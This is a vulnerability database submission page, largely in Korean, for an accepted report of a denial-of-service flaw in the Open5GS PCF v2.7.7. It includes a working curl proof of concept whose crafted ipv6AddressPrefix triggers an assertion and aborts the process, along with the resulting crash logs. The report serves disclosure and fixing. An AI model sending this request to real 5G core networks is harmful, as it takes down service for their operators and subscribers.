제출 #808443: Open5gs PCF v2.7.7 Denial of Service정보

제목	Open5gs PCF v2.7.7 Denial of Service
설명	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description PCF crashes when `SmPolicyContextData.ipv6AddressPrefix` is syntactically valid but not `/128`. The handler asserts that `pcf_sess_set_ipv6prefix()` succeeds: ```c ogs_assert(true == pcf_sess_set_ipv6prefix(sess, SmPolicyContextData->ipv6_address_prefix)); ``` Inside `pcf_sess_set_ipv6prefix()`, the parsed prefix length is required to be exactly `OGS_IPV6_128_PREFIX_LEN`: ```c ogs_assert(sess->ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN); ``` So a valid prefix such as `2001:db8::1/64` becomes a process-killing assert. ### Steps to reproduce ```bash IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' pcf) curl --http2-prior-knowledge -m 5 -sS -i \ -X POST "http://$IP/npcf-smpolicycontrol/v1/sm-policies" \ -H 'content-type: application/json' \ --data '{"supi":"imsi-001010000000002","pduSessionId":2,"pduSessionType":"IPV6","dnn":"internet","notificationUri":"http://127.0.0.1:9999/cb","ipv6AddressPrefix":"2001:db8::1/64","sliceInfo":{"sst":1,"sd":"000001"}}' ``` Then check: ```bash docker logs --since 2026-04-10T18:37:20Z pcf docker inspect -f '{{.RestartCount}} {{.State.StartedAt}}' pcf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer 04/10 18:37:20.063: [pcf] FATAL: pcf_sess_set_ipv6prefix: Assertion `sess->ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN' failed. (../src/pcf/context.c:675) The container restarted automatically after the crash. ``` ### Expected behaviour PCF should reject non-`/128` prefixes with a normal HTTP error response. ### Observed Behaviour The connection is reset and the PCF process aborts on the prefix-length assertion. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
원천	⚠️ https://github.com/open5gs/open5gs/issues/4439
사용자	LinZiyu (UID 94035)
제출	2026. 04. 20. PM 08:37 (1 월 ago)
모더레이션	2026. 05. 09. AM 09:35 (19 days later)
상태	수락
VulDB 항목	362441 [Open5GS 까지 2.7.7 PCF /src/pcf/context.c pcf_sess_set_ipv6prefix SmPolicyContextData.ipv6AddressPrefix 서비스 거부]
포인트들	20

◂ 이전 개요 다음 ▸

Interested in the pricing of exploits?

See the underground prices here!